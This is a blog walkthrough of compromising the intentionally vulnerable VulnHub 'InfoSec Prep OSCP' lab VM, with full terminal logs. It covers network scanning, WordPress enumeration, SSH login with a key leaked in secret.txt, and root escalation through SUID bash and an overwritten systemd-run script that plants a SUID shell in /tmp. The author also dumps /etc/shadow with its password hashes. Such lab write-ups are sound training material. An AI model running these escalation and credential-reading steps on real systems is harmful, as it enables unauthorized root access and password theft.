Address
304 North Cardinal St.
Dorchester Center, MA 02124
Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM
I know that these posts are slightly repetitive, but I also solved VulnHub InfoSec Prep OSCP during my streaming!
VulnHub InfoSec Prep OSCP Walkthrough – Introduction
Just like my VulnHub Relevant walkthrough, this VulnHub box starts off attacking WordPress.
This time, it’s InfoSec Prep OSCP by FalconSpy, which you can download here.
YouTube Version of this Post
If you prefer video and audio over just reading the text, then you can find the YouTube version of this post below.
That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!
Get Your NordVPN Offer Now!
Enumeration
First, I ran netdiscover to get the IP of my target.
root@kali:~# netdiscover -i eth0 -r 192.168.5.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 8 Captured ARP Req/Rep packets, from 7 hosts. Total size: 480 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.5.221 08:00:27:20:f3:7c 1 60 PCS Systemtechnik GmbH
Next, I ran Nmap and saw that only ports 22 and 80 were listening on the host.
root@kali:~/VulnHub/oscpPrep# nmap -A 192.168.5.221 Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-27 19:17 EDT Nmap scan report for 192.168.5.221 Host is up (0.00086s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: WordPress 5.4.2 | http-robots.txt: 1 disallowed entry |_/secret.txt |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: OSCP Voucher – Just another WordPress site MAC Address: 08:00:27:20:F3:7C (Oracle VirtualBox virtual NIC) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.70%E=4%D=8/27%OT=22%CT=1%CU=34338%PV=Y%DS=1%DC=D%G=Y%M=080027%T OS:M=5F483F31%P=i686-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%T OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5= OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0% OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S= OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R= OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N% OS:T=40%CD=S) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.86 ms 192.168.5.221 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 31.43 seconds
As I mentioned in the introduction, the target was yet another WordPress instance.
Using standard WordPress user enumeration, I found that ‘admin’ was the only valid username.
This WordPress instance was also vulnerable to username enumeration on the login page, as you can see from the following error.
Next, I ran CMSmap to see if there were any vulnerable plugins on the target.
root@kali:~/tools/CMSmap# python3 cmsmap.py http://192.168.5.221/ [-] Date & Time: 27/08/2020 19:22:32 [-] ExploitDB and CMSmap plugins are not updated to the latest version [-] Would you like to update it? [y/N]: n [I] Threads: 5 [-] Target: http://192.168.5.221 (192.168.5.221) [M] Website Not in HTTPS: http://192.168.5.221 [I] Server: Apache/2.4.41 (Ubuntu) [L] X-Frame-Options: Not Enforced [I] Strict-Transport-Security: Not Enforced [I] X-Content-Security-Policy: Not Enforced [I] X-Content-Type-Options: Not Enforced [L] Robots.txt Found: http://192.168.5.221/robots.txt [I] CMS Detection: WordPress [I] WordPress Version: 5.4.2 [I] WordPress Theme: twentytwenty [-] WordPress usernames identified: [M] admin [M] XML-RPC services are enabled [I] Autocomplete Off Not Found: http://192.168.5.221/wp-login.php [-] Default WordPress Files: ... [I] akismet v4.1.5 [M] EDB-ID: 37826 "WordPress Core 3.4.2 - Multiple Path Disclosure Vulnerabilities" [M] EDB-ID: 37902 "WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities" [I] worprees plugin bug dar grep: plugin: No such file or directory grep: bug: No such file or directory grep: dar[&=/]: No such file or directory [M] EDB-ID: 48065 "WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion" [I] Checking for Directory Listing Enabled ... ... [-] Date & Time: 27/08/2020 19:24:55 [-] Completed in: 0:02:22
When I looked at robots.txt, I discovered a reference to a secret.txt file, which seemed promising.
Initial Foothold
First, I visited the secret.txt file, which seemed to be base64 encoded.
When I decoded the text, it was an OpenSSH private key.
I downloaded the secret, decoded it, and saved it to an SSH private key file.
root@kali:~/VulnHub/oscpPrep# wget 192.168.5.221/secret.txt --2020-08-27 19:33:52-- http://192.168.5.221/secret.txt Connecting to 192.168.5.221:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3502 (3.4K) [text/plain] Saving to: 'secret.txt' secret.txt 100%[===================>] 3.42K --.-KB/s in 0s 2020-08-27 19:33:52 (267 MB/s) - 'secret.txt' saved [3502/3502] root@kali:~/VulnHub/oscpPrep# cat secret.txt | tr -d '\n' > newsecret.txt root@kali:~/VulnHub/oscpPrep# cat newsecret.txt | base64 -d > newssh-key root@kali:~/VulnHub/oscpPrep# chmod 600 newssh-key
When I looked at the home page again, it referenced an ‘oscp’ user, so I was hoping that this was who the key was for.
Using the ‘oscp’ username and my ‘secret’ key, I connected successfully to the box!
root@kali:~/VulnHub/oscpPrep# ssh -i newssh-key [email protected] Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64) ... Last login: Sat Jul 11 16:50:11 2020 from 192.168.128.1 -bash-5.0$ id uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)Get Your NordVPN Offer Now!
Privilege Escalation
First, I searched the box for any SUID binaries, as this is a common method of privilege escalation.
-bash-5.0$ find / -perm -u=s -type f 2>/dev/null /snap/snapd/8790/usr/lib/snapd/snap-confine /snap/snapd/8140/usr/lib/snapd/snap-confine /snap/core18/1885/bin/mount /snap/core18/1885/bin/ping /snap/core18/1885/bin/su /snap/core18/1885/bin/umount /snap/core18/1885/usr/bin/chfn /snap/core18/1885/usr/bin/chsh /snap/core18/1885/usr/bin/gpasswd /snap/core18/1885/usr/bin/newgrp /snap/core18/1885/usr/bin/passwd /snap/core18/1885/usr/bin/sudo /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core18/1885/usr/lib/openssh/ssh-keysign /snap/core18/1754/bin/mount /snap/core18/1754/bin/ping /snap/core18/1754/bin/su /snap/core18/1754/bin/umount /snap/core18/1754/usr/bin/chfn /snap/core18/1754/usr/bin/chsh /snap/core18/1754/usr/bin/gpasswd /snap/core18/1754/usr/bin/newgrp /snap/core18/1754/usr/bin/passwd /snap/core18/1754/usr/bin/sudo /snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core18/1754/usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/bin/gpasswd /usr/bin/mount /usr/bin/fusermount /usr/bin/passwd /usr/bin/newgrp /usr/bin/at /usr/bin/sudo /usr/bin/chfn /usr/bin/bash /usr/bin/pkexec /usr/bin/umount /usr/bin/chsh /usr/bin/su
As you can see, /usr/bin/bash was actually SUID root, and I was able to IMMEDIATELY escalate my privileges! I’m not sure if this was the intended solution, but I’ll gladly take it.
-bash-5.0$ /usr/bin/bash -p bash-5.0# id uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)
Before searching the box for additional escalation methods, I grabbed the contents of the flag file.
bash-5.0# cat flag.txt d73b04b0e696b0945283defa3eee4538
I also grabbed the shadow file, for potential future cracking.
bash-5.0# cat /etc/shadow root:$6$.wvqHr9ixq/hDW8t$a/dHKimULfr5rJTDlS7uoUanuJB2YUUkh.LWSKF7kTNp4aL8UTlOk2wT8IkAgJ.vDF/ThSIOegsuclEgm9QfT1:18452:0:99999:7::: daemon:*:18375:0:99999:7::: bin:*:18375:0:99999:7::: sys:*:18375:0:99999:7::: sync:*:18375:0:99999:7::: games:*:18375:0:99999:7::: man:*:18375:0:99999:7::: lp:*:18375:0:99999:7::: mail:*:18375:0:99999:7::: news:*:18375:0:99999:7::: uucp:*:18375:0:99999:7::: proxy:*:18375:0:99999:7::: www-data:*:18375:0:99999:7::: backup:*:18375:0:99999:7::: list:*:18375:0:99999:7::: irc:*:18375:0:99999:7::: gnats:*:18375:0:99999:7::: nobody:*:18375:0:99999:7::: systemd-network:*:18375:0:99999:7::: systemd-resolve:*:18375:0:99999:7::: systemd-timesync:*:18375:0:99999:7::: messagebus:*:18375:0:99999:7::: syslog:*:18375:0:99999:7::: _apt:*:18375:0:99999:7::: tss:*:18375:0:99999:7::: uuidd:*:18375:0:99999:7::: tcpdump:*:18375:0:99999:7::: landscape:*:18375:0:99999:7::: pollinate:*:18375:0:99999:7::: sshd:*:18452:0:99999:7::: systemd-coredump:!!:18452:::::: oscp:$6$k8OEgwaFdUqpVETQ$sKlBojI3IYunw8wEDAyoFdHgVtOPzkDPqksql7IWzpfZXpd3UqP569BokTZ52mDroq/rmJY9zgfeQVmBFu/Sf.:18452:0:99999:7::: lxd:!:18452:::::: mysql:!:18452:0:99999:7:::
There was also a file called ‘ip’ owned by root in the oscp user’s home directory.
-bash-5.0$ cat ip #!/bin/sh cp /etc/issue-standard /etc/issue /usr/local/bin/get-ip-address >> /etc/issue
The ‘ip-update’ service called this binary, which seemed interesting.
-bash-5.0$ grep -r "/home/oscp/ip" /etc grep: /etc/sudoers: Permission denied grep: /etc/ufw/before.init: Permission denied grep: /etc/ufw/before6.rules: Permission denied grep: /etc/ufw/before.rules: Permission denied grep: /etc/ufw/after.init: Permission denied grep: /etc/ufw/after6.rules: Permission denied grep: /etc/ufw/user.rules: Permission denied grep: /etc/ufw/after.rules: Permission denied grep: /etc/ufw/user6.rules: Permission denied grep: /etc/security/opasswd: Permission denied grep: /etc/gshadow-: Permission denied grep: /etc/shadow-: Permission denied grep: /etc/polkit-1/localauthority: Permission denied grep: /etc/ssl/private: Permission denied /etc/systemd/system/ip-update.service:ExecStart=/home/oscp/ip
-bash-5.0$ cat /etc/systemd/system/ip-update.service [Unit] Description=Write current ip addr to /etc/issue [Service] Type=oneshot RemainAfterExit=true ExecStart=/home/oscp/ip [Install] WantedBy=multi-user.target
As I owned my home directory, I could overwrite the existing ‘ip’ file and use the service as another avenue of privilege escalation.
-bash-5.0$ cat ip #!/bin/bash cp /usr/bin/bash /tmp/r00t chown root:root /tmp/r00t chmod 4755 /tmp/r00t -bash-5.0$ chmod +x ip -bash-5.0$ ls -al /tmp total 52 drwxrwxrwt 13 root root 4096 Aug 27 23:51 . drwxr-xr-x 20 root root 4096 Jul 9 03:25 .. drwxrwxrwt 2 root root 4096 Aug 27 19:02 .font-unix drwxrwxrwt 2 root root 4096 Aug 27 19:02 .ICE-unix drwx------ 3 root root 4096 Aug 27 19:02 snap.lxd drwx------ 3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-apache2.service-lzxICh drwx------ 3 root root 4096 Aug 27 23:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-fwupd.service-Kb1GYe drwx------ 3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-systemd-logind.service-5WZZXe drwx------ 3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-systemd-resolved.service-n5EyAi drwx------ 3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-systemd-timesyncd.service-5RYQag drwxrwxrwt 2 root root 4096 Aug 27 19:02 .Test-unix drwxrwxrwt 2 root root 4096 Aug 27 19:02 .X11-unix drwxrwxrwt 2 root root 4096 Aug 27 19:02 .XIM-unix ... -bash-5.0$ ls -al /tmp total 1204 drwxrwxrwt 12 root root 4096 Aug 28 00:03 . drwxr-xr-x 20 root root 4096 Jul 9 03:25 .. drwxrwxrwt 2 root root 4096 Aug 28 00:03 .font-unix drwxrwxrwt 2 root root 4096 Aug 28 00:03 .ICE-unix -rwsr-xr-x 1 root root 1183448 Aug 28 00:03 r00t
When I executed my new /tmp/r00t binary, I also gained the expected root permissions!
-bash-5.0$ /tmp/r00t -p r00t-5.0# id uid=1000(oscp) gid=1000(oscp) euid=0(root) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)Get Your NordVPN Offer Now!
VulnHub InfoSec Prep OSCP Walkthrough – Conclusion
I’m still not sure if /usr/bin/bash was the expected method of privilege escalation, but the ‘ip’ script was a good edition.
This was a VERY simple box, although I’m not sure how good of a VulnHub OSCP prep box it is.
In the meantime, let me know if there is any other content that you’d like to see, or just come on over and like/subscribe to the YouTube channel!
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
This page contains links to products that I may receive compensation from at no additional cost to you. View my Affiliate Disclosure page here. As an Amazon Associate, I earn from qualifying purchases.
